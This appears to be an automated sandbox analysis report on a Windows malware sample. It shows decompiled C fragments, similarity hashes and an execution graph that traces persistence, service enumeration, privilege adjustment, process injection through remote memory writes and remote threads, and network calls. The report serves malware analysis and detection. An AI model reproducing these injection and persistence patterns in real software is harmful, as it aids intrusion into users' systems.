                                                                                              • API ID: ErrorLast$ByteCharConvertH_prolog3MultiStringWide_com_util::_malloclstrlen
                                                                                              • String ID: GET
                                                                                              • API String ID: 2215413652-1805413626
                                                                                              • Opcode ID: 3d4e7599044e169ab4e8191e163a2a8d68656d121fc41c30160acc4a121b9639
                                                                                              • Instruction ID: b5799b169d499e4633462367895dfdb7fb76e3815ef3a6e36040b33d59e7b8f0
                                                                                              • Opcode Fuzzy Hash: 3d4e7599044e169ab4e8191e163a2a8d68656d121fc41c30160acc4a121b9639
                                                                                              • Instruction Fuzzy Hash: 09F0EC71940325D7D3206BA5894235EF5A09F14B25F20872FEA947B2D1C3BC490187CD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403D6F(intOrPtr _a4) {
                                                                                              				intOrPtr _t2;
                                                                                              				struct _CRITICAL_SECTION* _t3;
                                                                                              
                                                                                              				_t2 = _a4;
                                                                                              				if(_t2 < 0x412320 || _t2 > 0x412580) {
                                                                                              					_t3 = _t2 + 0x20;
                                                                                              					EnterCriticalSection(_t3);
                                                                                              					return _t3;
                                                                                              				} else {
                                                                                              					return E004025AC((_t2 - 0x412320 >> 5) + 0x10);
                                                                                              				}
                                                                                              			}





                                                                                              0x00403d6f
                                                                                              0x00403d7a
                                                                                              0x00403d93
                                                                                              0x00403d97
                                                                                              0x00403d9d
                                                                                              0x00403d83
                                                                                              0x00403d92
                                                                                              0x00403d92

                                                                                              APIs
                                                                                              • __lock.LIBCMT ref: 00403D8C
                                                                                                • Part of subcall function 004025AC: __mtinitlocknum.LIBCMT ref: 004025C0
                                                                                                • Part of subcall function 004025AC: __amsg_exit.LIBCMT ref: 004025CC
                                                                                                • Part of subcall function 004025AC: EnterCriticalSection.KERNEL32(00000205,00000205,?,00407FF2,00000004,00411378,0000000C,00405E3E,00000000,00000000,00000000,00000000,00000000,00405965,00000001,00000214), ref: 004025D4
                                                                                              • EnterCriticalSection.KERNEL32(?,004085BD,?,004113D8,0000000C,0040695B,?,00411270,00000010,00403D62), ref: 00403D97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                              • String ID: #A
                                                                                              • API String ID: 3996875869-2021562773
                                                                                              • Opcode ID: d5605d4cb051e9af7bf4aad3cc0443e9c517dbe51f323c7af5a3187204e4b6c5
                                                                                              • Instruction ID: 158ae6ec3bb8ba8058d4a6d932541656db5e5d00f7ad4efe6cacdd5143b1a615
                                                                                              • Opcode Fuzzy Hash: d5605d4cb051e9af7bf4aad3cc0443e9c517dbe51f323c7af5a3187204e4b6c5
                                                                                              • Instruction Fuzzy Hash: 89D022BAA0020173DF281E769F8E90E275DCA843037148C3BF802E17C1CABCEA90840C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:2%
                                                                                              Dynamic/Decrypted Code Coverage:99.8%
                                                                                              Signature Coverage:19.7%
                                                                                              Total number of Nodes:579
                                                                                              Total number of Limit Nodes:22
                                                                                              execution_graph 23727 425d420 83 API calls 23728 4259820 96 API calls CatchGuardHandler 23729 4252220 24 API calls 23730 425a220 WaitForSingleObject CloseHandle RtlDeleteCriticalSection 23813 4256d20 137 API calls 23731 4275420 InterlockedCompareExchange InterlockedCompareExchange InterlockedCompareExchange HeapFree 23732 4272220 81 API calls 23815 4271320 6 API calls CatchGuardHandler 23734 4290620 21 API calls __startOneArgErrorHandling 23816 425352b 27 API calls __CxxThrowException@8 23736 427e036 21 API calls _free 23737 425a830 24 API calls CatchGuardHandler 23738 4258230 11 API calls 23818 4258d30 74 API calls CatchGuardHandler 23819 4254130 115 API calls 23741 4259c00 154 API calls CatchGuardHandler 23742 4256400 61 API calls 23743 4259000 123 API calls CatchGuardHandler 23820 4257b00 WaitForSingleObject SetLastError 23821 425e700 118 API calls CatchGuardHandler 23744 4265400 13 API calls 23745 4264000 35 API calls 23822 4264100 WaitForMultipleObjects TerminateThread TerminateProcess 23746 4271800 12 API calls 23823 4292304 52 API calls __CreateFrameInfo 23299 4276109 23300 4276115 ___BuildCatchObject 23299->23300 23319 4275cc7 23300->23319 23302 427611c 23303 4276149 23302->23303 23313 4276121 ___scrt_is_nonwritable_in_current_image ___BuildCatchObject 23302->23313 23351 427667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23302->23351 23330 4275c2a 23303->23330 23306 4276158 __RTC_Initialize 23306->23313 23333 4275ea1 23306->23333 23310 4276170 23311 4275ea1 29 API calls 23310->23311 23312 427617c ___scrt_initialize_default_local_stdio_options 23311->23312 23337 4281678 23312->23337 23317 427619d 23317->23313 23345 428161c 23317->23345 23320 4275cd0 23319->23320 23352 42764ca IsProcessorFeaturePresent 23320->23352 23322 4275cdc 23353 427db97 10 API calls 4 library calls 23322->23353 23324 4275ce1 23329 4275ce5 23324->23329 23354 42815d3 23324->23354 23327 4275cfc 23327->23302 23329->23302 23370 4275d00 23330->23370 23332 4275c31 23332->23306 23376 4275e66 23333->23376 23336 42768a7 RtlInitializeSListHead 23336->23310 23340 428168f 23337->23340 23338 4275afe CatchGuardHandler 5 API calls 23339 4276192 23338->23339 23339->23313 23341 4275bff 23339->23341 23340->23338 23342 4275c04 ___scrt_initialize_onexit_tables 23341->23342 23344 4275c0d 23342->23344 23384 42764ca IsProcessorFeaturePresent 23342->23384 23344->23317 23346 428164b 23345->23346 23347 4281667 23345->23347 23346->23347 23385 4251050 23346->23385 23348 4275afe CatchGuardHandler 5 API calls 23347->23348 23349 4281674 23348->23349 23349->23313 23351->23303 23352->23322 23353->23324 23358 428a907 23354->23358 23357 427dbd6 8 API calls 3 library calls 23357->23329 23361 428a920 23358->23361 23360 4275cee 23360->23327 23360->23357 23362 4275afe 23361->23362 23363 4275b07 23362->23363 23364 4275b09 IsProcessorFeaturePresent 23362->23364 23363->23360 23366 4275ef2 23364->23366 23369 4275eb6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23366->23369 23368 4275fd5 23368->23360 23369->23368 23371 4275d13 ___scrt_initialize_onexit_tables 23370->23371 23372 4275d0e 23370->23372 23371->23332 23372->23371 23375 427667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23372->23375 23374 4275d96 23375->23374 23377 4275e83 23376->23377 23378 4275e8a 23376->23378 23382 428144b 29 API calls __onexit 23377->23382 23383 42814bb 29 API calls __onexit 23378->23383 23381 4275e88 23381->23336 23382->23381 23383->23381 23384->23344 23392 4291860 23385->23392 23388 4275ea1 29 API calls 23389 4251083 23388->23389 23390 4275afe CatchGuardHandler 5 API calls 23389->23390 23391 4251093 23390->23391 23391->23346 23393 4251068 WSAStartup 23392->23393 23393->23388 23748 428f606 69 API calls 2 library calls 23824 428a719 29 API calls 23750 425a010 8 API calls CatchGuardHandler 23751 4251010 30 API calls 23825 4259510 129 API calls CatchGuardHandler 23826 4259f10 15 API calls 3 library calls 23827 4262f10 10 API calls 23753 427621b 51 API calls 3 library calls 23829 4289d68 29 API calls _free 23755 4275c64 20 API calls ___scrt_initialize_onexit_tables 23830 425af60 GetProcessHeap HeapFree 23756 4263e60 18 API calls 23757 428906f 11 API calls 2 library calls 23832 4271560 62 API calls 2 library calls 23760 428a67b 25 API calls 2 library calls 23835 4259170 50 API calls CatchGuardHandler 23761 4271870 96 API calls 23836 4271970 34 API calls 23837 4255d7c 33 API calls 4 library calls 23762 425b840 23 API calls 23763 425a240 64 API calls 23839 4251140 43 API calls 23764 4268040 38 API calls CatchGuardHandler 23840 4261d40 144 API calls 23841 4263f40 31 API calls CatchGuardHandler 23842 4261940 55 API calls 23765 427dc40 6 API calls 3 library calls 23768 4251250 11 API calls 23843 4251750 8 API calls 23769 426f850 28 API calls 23770 4262050 17 API calls 23771 4264250 188 API calls 23846 4262f50 119 API calls 23847 4273150 32 API calls CatchGuardHandler 23774 42510a0 30 API calls CatchGuardHandler 23775 425eaa0 15 API calls CatchGuardHandler 23776 425f2a0 26 API calls 23777 42894ae FreeLibrary 23778 4274ca0 10 API calls 23848 42725a0 146 API calls 23779 428cca0 42 API calls 23155 42760b6 23156 42760f4 dllmain_crt_process_detach 23155->23156 23157 42760c1 23155->23157 23164 42760d0 23156->23164 23158 42760e6 dllmain_crt_process_attach 23157->23158 23159 42760c6 23157->23159 23158->23164 23160 42760dc 23159->23160 23162 42760cb 23159->23162 23166 4275c38 29 API calls 23160->23166 23162->23164 23165 4275c57 27 API calls 23162->23165 23165->23164 23166->23164 23851 42599b0 83 API calls 23852 4267bb0 34 API calls 23853 4272fb0 timeGetTime 23167 42763be 23168 42763c7 23167->23168 23169 42763cc dllmain_dispatch 23167->23169 23171 427680b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 23168->23171 23171->23169 23781 4288eb6 12 API calls 23782 4259480 66 API calls 23783 4252680 SetEvent ___swprintf_l 23784 425a080 12 API calls CatchGuardHandler 23855 425fd80 40 API calls 23856 425a980 46 API calls CatchGuardHandler 23857 4261b80 6 API calls 23785 4271480 63 API calls 23859 4251f95 62 API calls 23860 4289999 27 API calls 2 library calls 23787 4258e90 97 API calls CatchGuardHandler 23788 4254090 28 API calls 23789 4259a90 59 API calls CatchGuardHandler 23790 4267c90 SetEvent InterlockedExchange InterlockedExchange InterlockedExchange InterlockedExchange 23791 4262690 9 API calls 23861 426d790 154 API calls CatchGuardHandler 23862 426f190 44 API calls CatchGuardHandler 23863 4272f90 31 API calls 23394 4276298 23395 42762a4 ___BuildCatchObject 23394->23395 23396 42762cd dllmain_raw 23395->23396 23397 42762c8 23395->23397 23399 42762b3 ___BuildCatchObject 23395->23399 23398 42762e7 dllmain_crt_dispatch 23396->23398 23396->23399 23407 426c680 23397->23407 23398->23397 23398->23399 23402 4276334 23402->23399 23403 427633d dllmain_crt_dispatch 23402->23403 23403->23399 23405 4276350 dllmain_raw 23403->23405 23404 426c680 470 API calls 23406 4276320 dllmain_crt_dispatch dllmain_raw 23404->23406 23405->23399 23406->23402 23408 426c68e 23407->23408 23409 426c689 23407->23409 23408->23402 23408->23404 23411 426c460 GetCommandLineW GetModuleFileNameW 23409->23411 23449 427d9be 23411->23449 23414 426c5d6 23451 426abf0 AllocateAndInitializeSid 23414->23451 23415 426c4b9 StrStrIW 23416 426c514 StrStrIW 23415->23416 23417 426c4cb CreateThread CloseHandle CreateThread CloseHandle 23415->23417 23420 426c520 CreateThread WaitForSingleObject CloseHandle 23416->23420 23421 426c55c StrStrIW 23416->23421 23419 4275afe CatchGuardHandler 5 API calls 23417->23419 23722 426ab30 GetTickCount Sleep SetProcessShutdownParameters SetConsoleCtrlHandler 23417->23722 23723 4269e60 123 API calls 23417->23723 23423 426c510 23419->23423 23424 4275afe CatchGuardHandler 5 API calls 23420->23424 23724 426b5f0 211 API calls CatchGuardHandler 23420->23724 23425 426c56c 23421->23425 23426 426c66b 23421->23426 23422 426c5db 23427 426c5df CreateThread WaitForSingleObject CloseHandle 23422->23427 23428 426c60d 23422->23428 23423->23408 23432 426c558 23424->23432 23505 4269620 17 API calls CatchGuardHandler 23425->23505 23431 4275afe CatchGuardHandler 5 API calls 23426->23431 23429 426c614 InternetOpenW 23427->23429 23721 426b5f0 211 API calls CatchGuardHandler 23427->23721 23462 426c250 GetModuleFileNameW 23428->23462 23429->23426 23434 426c62d InternetOpenUrlW 23429->23434 23435 426c677 23431->23435 23432->23408 23436 426c65f InternetCloseHandle InternetCloseHandle 23434->23436 23437 426c648 InternetCloseHandle 23434->23437 23435->23408 23436->23426 23439 4275afe CatchGuardHandler 5 API calls 23437->23439 23438 426c581 23438->23426 23506 426bd60 23438->23506 23441 426c65b 23439->23441 23441->23408 23442 426c5a2 23442->23426 23443 426c5aa 23442->23443 23444 426c5b1 Sleep 23443->23444 23446 426c5c5 23443->23446 23445 426bd60 62 API calls 23444->23445 23445->23443 23447 4275afe CatchGuardHandler 5 API calls 23446->23447 23448 426c5d2 23447->23448 23448->23408 23450 426c49f lstrcmpiW 23449->23450 23450->23414 23450->23415 23452 426ac50 23451->23452 23453 426ac38 CheckTokenMembership FreeSid 23451->23453 23454 426ac56 23452->23454 23455 426ac69 23452->23455 23453->23452 23456 4275afe CatchGuardHandler 5 API calls 23454->23456 23538 426ab70 8 API calls CatchGuardHandler 23455->23538 23458 426ac65 23456->23458 23458->23422 23459 426ac6e 23460 4275afe CatchGuardHandler 5 API calls 23459->23460 23461 426ac7e 23460->23461 23461->23422 23463 427d9be 23462->23463 23464 426c28b lstrcmpiW 23463->23464 23465 426c2a7 23464->23465 23466 426c2d4 GetModuleFileNameW 23464->23466 23468 426c2c1 MoveFileExW 23465->23468 23469 426c44c 23465->23469 23467 426c2ec 23466->23467 23467->23469 23470 426c2f8 PathFileExistsW 23467->23470 23471 426c31e ___scrt_fastfail 23468->23471 23472 4275afe CatchGuardHandler 5 API calls 23469->23472 23470->23469 23470->23471 23539 4266fc0 23471->23539 23473 426c458 23472->23473 23473->23429 23475 426c33f 23476 426c345 23475->23476 23477 426c35b 23475->23477 23479 4266c70 15 API calls 23476->23479 23556 4266c70 23477->23556 23481 426c34c 23479->23481 23480 426c359 23570 4265960 LoadLibraryA GetProcAddress 23480->23570 23613 4266df0 6 API calls 23481->23613 23486 426c38e 23486->23469 23590 42696b0 23486->23590 23488 426c3b2 23598 42694d0 23488->23598 23490 426c3c5 23491 426c3df 23490->23491 23614 42578b0 12 API calls CatchGuardHandler 23490->23614 23493 42694d0 15 API calls 23491->23493 23494 426c3e9 23493->23494 23495 426c403 23494->23495 23615 42578b0 12 API calls CatchGuardHandler 23494->23615 23497 426bd60 62 API calls 23495->23497 23498 426c40c 23497->23498 23499 426c410 23498->23499 23500 426c431 VirtualFree DeleteFileW 23498->23500 23504 426c430 23499->23504 23616 426bbc0 17 API calls 23499->23616 23500->23469 23502 426c41c Sleep 23503 426bd60 62 API calls 23502->23503 23503->23499 23504->23500 23505->23438 23507 427dea0 ___scrt_fastfail 23506->23507 23508 426bdac OpenSCManagerW 23507->23508 23509 426bdca 23508->23509 23510 426bdd9 EnumServicesStatusExW 23508->23510 23511 4275afe CatchGuardHandler 5 API calls 23509->23511 23512 426be27 LocalAlloc 23510->23512 23513 426be0e CloseServiceHandle 23510->23513 23514 426bdd5 23511->23514 23516 426be40 CloseServiceHandle 23512->23516 23517 426be5f EnumServicesStatusExW 23512->23517 23515 4275afe CatchGuardHandler 5 API calls 23513->23515 23514->23442 23518 426be23 23515->23518 23519 4275afe CatchGuardHandler 5 API calls 23516->23519 23520 426be95 CloseServiceHandle LocalFree 23517->23520 23521 426bebc LocalAlloc 23517->23521 23518->23442 23523 426be5b 23519->23523 23524 4275afe CatchGuardHandler 5 API calls 23520->23524 23522 426bfba LocalFree LocalFree CloseServiceHandle 23521->23522 23529 426bef1 23521->23529 23536 426bfd0 23522->23536 23523->23442 23525 426beb8 23524->23525 23525->23442 23526 426bf0a OpenServiceW 23526->23529 23530 426bf1c QueryServiceConfigW 23526->23530 23527 426c008 23531 4275afe CatchGuardHandler 5 API calls 23527->23531 23528 426bfb4 23528->23522 23529->23526 23529->23528 23532 426bf87 CloseServiceHandle 23529->23532 23534 426bf46 StrStrIW 23529->23534 23537 426bf75 CloseServiceHandle 23529->23537 23530->23529 23530->23532 23533 426c01b 23531->23533 23532->23529 23533->23442 23534->23529 23534->23532 23536->23527 23647 4269000 LoadLibraryA GetProcAddress 23536->23647 23537->23529 23538->23459 23617 4265ca0 GetCurrentProcessId CreateToolhelp32Snapshot Process32FirstW 23539->23617 23542 4266fe7 23636 4265d40 10 API calls CatchGuardHandler 23542->23636 23543 4267004 ___scrt_fastfail 23624 4266ef0 OpenProcess 23543->23624 23545 4266fec 23545->23543 23546 4266ff2 23545->23546 23548 4275afe CatchGuardHandler 5 API calls 23546->23548 23550 4267000 23548->23550 23549 4267027 23549->23546 23551 4267045 23549->23551 23550->23475 23637 428096e 43 API calls 23551->23637 23553 4275afe CatchGuardHandler 5 API calls 23554 42670cf 23553->23554 23554->23475 23555 426707a 23555->23553 23638 4266050 23556->23638 23561 4266d56 RegCreateKeyExW 23563 4266d95 RegSetValueExW RegCloseKey 23561->23563 23564 4266dd0 23561->23564 23562 4266cff RegQueryValueExW RegCloseKey 23562->23561 23565 4266d40 23562->23565 23563->23564 23563->23565 23567 4275afe CatchGuardHandler 5 API calls 23564->23567 23566 4275afe CatchGuardHandler 5 API calls 23565->23566 23568 4266d52 23566->23568 23569 4266dde 23567->23569 23568->23480 23569->23480 23571 4265981 GetNativeSystemInfo 23570->23571 23572 42659a2 23570->23572 23571->23572 23573 4269770 23572->23573 23574 426978a CreateFileW 23573->23574 23575 4269788 23573->23575 23576 42697af GetFileSize 23574->23576 23577 42698fc 23574->23577 23575->23574 23578 42697c7 23576->23578 23579 42698f2 FindCloseChangeNotification 23576->23579 23577->23486 23580 426980d ReadFile 23578->23580 23584 42697d6 23578->23584 23579->23577 23581 42698f1 23580->23581 23582 4269826 23580->23582 23581->23579 23582->23581 23585 426984c SetFilePointer 23582->23585 23583 4269865 VirtualAlloc 23583->23581 23586 426987b ReadFile 23583->23586 23584->23581 23584->23583 23585->23583 23586->23581 23587 426988e 23586->23587 23588 4269895 VirtualFree CloseHandle 23587->23588 23589 42698b7 23587->23589 23588->23486 23589->23581 23591 42696cf 23590->23591 23592 4266050 8 API calls 23591->23592 23593 42696dc wsprintfW RegCreateKeyExW 23592->23593 23594 4269724 RegSetValueExW RegCloseKey 23593->23594 23595 4269750 23593->23595 23594->23595 23596 4275afe CatchGuardHandler 5 API calls 23595->23596 23597 426975f 23596->23597 23597->23488 23599 4266050 8 API calls 23598->23599 23600 42694ec wsprintfW 23599->23600 23601 427dea0 ___scrt_fastfail 23600->23601 23602 426952b RegOpenKeyExW 23601->23602 23603 42695f3 23602->23603 23604 426955b RegQueryValueExW RegCloseKey 23602->23604 23606 4275afe CatchGuardHandler 5 API calls 23603->23606 23604->23603 23605 426959c 23604->23605 23605->23603 23608 42695bb wsprintfW OpenEventW 23605->23608 23607 4269604 23606->23607 23607->23490 23609 42695ec CloseHandle 23608->23609 23610 4269608 23608->23610 23609->23603 23611 4275afe CatchGuardHandler 5 API calls 23610->23611 23612 4269615 23611->23612 23612->23490 23613->23480 23614->23491 23615->23495 23616->23502 23618 4265cef 23617->23618 23619 4265d1b FindCloseChangeNotification 23617->23619 23622 4265d0c 23618->23622 23623 4265cfe Process32NextW 23618->23623 23620 4275afe CatchGuardHandler 5 API calls 23619->23620 23621 4265d34 23620->23621 23621->23542 23621->23543 23622->23619 23623->23618 23623->23622 23625 4266fa5 23624->23625 23626 4266f20 K32GetModuleFileNameExW 23624->23626 23627 4275afe CatchGuardHandler 5 API calls 23625->23627 23626->23625 23628 4266f39 23626->23628 23629 4266fb2 23627->23629 23630 4266f4e 23628->23630 23631 4266f77 23628->23631 23629->23549 23632 4275afe CatchGuardHandler 5 API calls 23630->23632 23631->23631 23633 4275afe CatchGuardHandler 5 API calls 23631->23633 23634 4266f73 23632->23634 23635 4266fa1 23633->23635 23634->23549 23635->23549 23636->23545 23637->23555 23639 427dea0 ___scrt_fastfail 23638->23639 23640 42661cf RegOpenKeyExW 23639->23640 23641 42661ff RegQueryValueExW RegCloseKey 23640->23641 23642 426623f 23640->23642 23641->23642 23643 4275afe CatchGuardHandler 5 API calls 23642->23643 23644 426635d wsprintfW 23643->23644 23645 427dea0 23644->23645 23646 4266cd3 RegOpenKeyExW 23645->23646 23646->23561 23646->23562 23648 426922f 23647->23648 23649 4269049 RtlAdjustPrivilege 23647->23649 23718 426ad30 11 API calls CatchGuardHandler 23648->23718 23650 426905e OpenProcess 23649->23650 23651 426923c 23649->23651 23650->23651 23653 4269076 23650->23653 23655 4275afe CatchGuardHandler 5 API calls 23651->23655 23656 4265960 3 API calls 23653->23656 23654 4269234 23654->23650 23654->23651 23657 426924c 23655->23657 23658 426907b 23656->23658 23657->23536 23659 4269083 LoadLibraryA GetProcAddress 23658->23659 23660 4269250 VirtualAllocEx 23658->23660 23661 42690a2 23659->23661 23662 4269370 CloseHandle 23660->23662 23663 426926f WriteProcessMemory 23660->23663 23661->23660 23665 42690b5 23661->23665 23664 4275afe CatchGuardHandler 5 API calls 23662->23664 23666 4269362 VirtualFreeEx 23663->23666 23667 4269289 23663->23667 23668 4269389 23664->23668 23691 4268c60 23665->23691 23666->23662 23667->23666 23719 4265c40 6 API calls 2 library calls 23667->23719 23668->23536 23672 4269298 23673 42692b7 LoadLibraryA GetProcAddress 23672->23673 23674 426929c CreateRemoteThread 23672->23674 23678 42692f9 LoadLibraryA GetProcAddress 23673->23678 23682 42692d2 23673->23682 23676 4269345 WaitForSingleObject 23674->23676 23677 42692b3 23674->23677 23683 4269356 23676->23683 23677->23673 23679 426931c 23678->23679 23679->23676 23679->23683 23680 4269218 23717 4268d90 9 API calls 23680->23717 23682->23676 23682->23678 23683->23666 23684 42690e9 23684->23680 23707 4268b90 23684->23707 23685 4269227 23685->23662 23687 4269117 23688 42691fc WaitForSingleObject FindCloseChangeNotification 23687->23688 23689 4268b90 5 API calls 23687->23689 23688->23680 23690 4269193 23689->23690 23690->23680 23690->23688 23692 4268c7e 23691->23692 23694 4268cb1 23691->23694 23693 4268b90 5 API calls 23692->23693 23692->23694 23693->23694 23695 4268d19 23694->23695 23696 4268d39 GetModuleHandleW GetProcAddress GetProcAddress 23694->23696 23697 4268d6e 23694->23697 23695->23662 23699 4268ec0 23695->23699 23696->23697 23697->23695 23698 4268d79 RtlRestoreLastWin32Error 23697->23698 23698->23695 23700 4268ede 23699->23700 23702 4268f11 23699->23702 23701 4268b90 5 API calls 23700->23701 23700->23702 23701->23702 23703 4268fa1 GetModuleHandleW GetProcAddress GetProcAddress 23702->23703 23704 4268f79 23702->23704 23705 4268fd6 23702->23705 23703->23705 23704->23684 23705->23704 23706 4268fe1 RtlRestoreLastWin32Error 23705->23706 23706->23704 23708 4268bb4 23707->23708 23710 4268be5 23707->23710 23708->23710 23720 42686d0 5 API calls CatchGuardHandler 23708->23720 23712 4275afe CatchGuardHandler 5 API calls 23710->23712 23711 4268bbd 23711->23710 23713 4268bd5 23711->23713 23715 4268c57 23712->23715 23714 4275afe CatchGuardHandler 5 API calls 23713->23714 23716 4268be1 23714->23716 23715->23687 23716->23687 23717->23685 23718->23654 23719->23672 23720->23711 23725 425e6e0 109 API calls 23721->23725 23726 426c0a0 110 API calls 23721->23726 23793 42516e0 6 API calls CatchGuardHandler 23794 42592e0 42 API calls CatchGuardHandler 23795 426ece0 114 API calls CatchGuardHandler 23866 42619e0 DestroyCursor 23867 426f9e0 5 API calls CatchGuardHandler 23868 426ebe0 11 API calls CatchGuardHandler 23869 42763e1 26 API calls std::exception::exception 23796 4272ce0 htons WSAAddressToStringW htons StrPBrkW StrChrW 23870 427ebe0 RtlUnwind 23871 4291de4 55 API calls 2 library calls 23797 425ecf0 21 API calls 23799 42520f0 WaitForSingleObject CloseHandle 23800 425a2f0 CloseHandle 23872 425edf0 108 API calls 3 library calls 23873 42567f0 CloseDesktop DeleteDC ReleaseDC CloseHandle 23874 42521f0 waveOutWrite waveOutGetNumDevs waveOutOpen waveOutPrepareHeader SetEvent 23801 426e6f0 29 API calls 23802 426aaf0 78 API calls 23803 425b4c0 DeleteFileW GetFileAttributesW CreateFileW CloseHandle SetEvent 23804 42596c0 98 API calls CatchGuardHandler 23876 428cdcd 21 API calls _free 23877 4259fc0 ShellExecuteW 23805 426e4c0 SetLastError WSAEventSelect SetEvent 23806 4273cc0 134 API calls CatchGuardHandler 23807 4255cc9 RaiseException __CxxThrowException@8 23808 42834c7 27 API calls 23879 42523d0 29 API calls 23810 4262cd0 84 API calls 2 library calls 23880 426e9d0 11 API calls ___swprintf_l 23811 42718d0 SetLastError RtlEnterCriticalSection SetLastError RtlLeaveCriticalSection RtlLeaveCriticalSection 23812 42730d0 PostQueuedCompletionStatus SetLastError 23881 4273bd0 InterlockedCompareExchange SwitchToThread SetLastError PostQueuedCompletionStatus SetLastError 23172 4280bd5 23173 4280c00 23172->23173 23174 4280be4 23172->23174 23196 428a309 23173->23196 23174->23173 23176 4280bea 23174->23176 23200 4281772 20 API calls _abort 23176->23200 23179 4280bef 23201 427eee6 26 API calls _abort 23179->23201 23180 4280c2b 23202 4280cf9 42 API calls 23180->23202 23182 4280bf9 23184 4280c48 23203 4280e6e 20 API calls 2 library calls 23184->23203 23186 4280c55 23187 4280c6a 23186->23187 23188 4280c5e 23186->23188 23205 4280cf9 42 API calls 23187->23205 23204 4281772 20 API calls _abort 23188->23204 23192 4280c80 23195 4280c63 23192->23195 23206 42884ad 20 API calls _free 23192->23206 23193 4280cef 23193->23182 23207 42884ad 20 API calls _free 23195->23207 23197 428a312 23196->23197 23198 4280c07 GetModuleFileNameA 23196->23198 23208 428a208 23197->23208 23198->23180 23200->23179 23201->23182 23202->23184 23203->23186 23204->23195 23205->23192 23206->23195 23207->23193 23228 4288930 GetLastError 23208->23228 23210 428a215 23248 428a327 23210->23248 23212 428a21d 23257 4289f9c 23212->23257 23215 428a234 23215->23198 23219 428a26a 23221 428a272 23219->23221 23224 428a28f 23219->23224 23272 4281772 20 API calls _abort 23221->23272 23223 428a277 23273 42884ad 20 API calls _free 23223->23273 23226 428a2bb 23224->23226 23274 42884ad 20 API calls _free 23224->23274 23226->23223 23275 4289e72 26 API calls 23226->23275 23229 428894c 23228->23229 23230 4288946 23228->23230 23233 428899b SetLastError 23229->23233 23277 4288535 20 API calls 2 library calls 23229->23277 23276 428911b 11 API calls 2 library calls 23230->23276 23233->23210 23234 428895e 23235 4288966 23234->23235 23279 4289171 11 API calls 2 library calls 23234->23279 23278 42884ad 20 API calls _free 23235->23278 23238 428897b 23238->23235 23240 4288982 23238->23240 23239 428896c 23241 42889a7 SetLastError 23239->23241 23280 4288776 20 API calls _abort 23240->23280 23282 4287199 42 API calls _abort 23241->23282 23243 428898d 23281 42884ad 20 API calls _free 23243->23281 23247 4288994 23247->23233 23247->23241 23249 428a333 ___BuildCatchObject 23248->23249 23250 4288930 _abort 42 API calls 23249->23250 23255 428a33d 23250->23255 23252 428a3c1 ___BuildCatchObject 23252->23212 23255->23252 23283 4287199 42 API calls _abort 23255->23283 23284 4288ef7 RtlEnterCriticalSection 23255->23284 23285 42884ad 20 API calls _free 23255->23285 23286 428a3b8 RtlLeaveCriticalSection _abort 23255->23286 23287 427ef84 23257->23287 23260 4289fbd GetOEMCP 23263 4289fe6 23260->23263 23261 4289fcf 23262 4289fd4 GetACP 23261->23262 23261->23263 23262->23263 23263->23215 23264 42884e7 23263->23264 23265 4288525 23264->23265 23269 42884f5 _abort 23264->23269 23298 4281772 20 API calls _abort 23265->23298 23267 4288510 RtlAllocateHeap 23268 4288523 23267->23268 23267->23269 23268->23223 23271 428a3c9 54 API calls 2 library calls 23268->23271 23269->23265 23269->23267 23297 42809ac 7 API calls 2 library calls 23269->23297 23271->23219 23272->23223 23273->23215 23274->23226 23275->23223 23276->23229 23277->23234 23278->23239 23279->23238 23280->23243 23281->23247 23284->23255 23285->23255 23286->23255 23288 427ef97 23287->23288 23289 427efa1 23287->23289 23288->23260 23288->23261 23289->23288 23290 4288930 _abort 42 API calls 23289->23290 23291 427efc2 23290->23291 23295 4288dff 42 API calls __cftof 23291->23295 23293 427efdb 23296 4288e2c 42 API calls __cftof 23293->23296 23295->23293 23296->23288 23297->23269 23298->23268

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 91%
                                                                                              			E0426C460(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				long _v532;
                                                                                              				signed int _t15;
                                                                                              				int _t23;
                                                                                              				signed int _t24;
                                                                                              				void* _t26;
                                                                                              				void* _t28;
                                                                                              				signed int _t38;
                                                                                              				signed int _t41;
                                                                                              				signed int _t42;
                                                                                              				void* _t75;
                                                                                              				signed int _t77;
                                                                                              				WCHAR* _t80;
                                                                                              				void* _t82;
                                                                                              				signed int _t83;
                                                                                              				void* _t84;
                                                                                              				signed int _t86;
                                                                                              
                                                                                              				_t15 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t15 ^ _t86;
                                                                                              				_t80 = GetCommandLineW();
                                                                                              				GetModuleFileNameW(0,  &_v528, 0x104);
                                                                                              				_t23 = lstrcmpiW(E0427D9BE( &_v528, 0x5c) + 2, L"svchost.exe"); // executed
                                                                                              				if(_t23 != 0) {
                                                                                              					_t24 = E0426ABF0();
                                                                                              					__eflags = _t24;
                                                                                              					if(_t24 != 0) {
                                                                                              						E0426C250(__ebx, _t80, __edi, _t80); // executed
                                                                                              					} else {
                                                                                              						_t82 = CreateThread(0, 0, E0426B5F0, 0, 0,  &_v532);
                                                                                              						WaitForSingleObject(_t82, 0xffffffff);
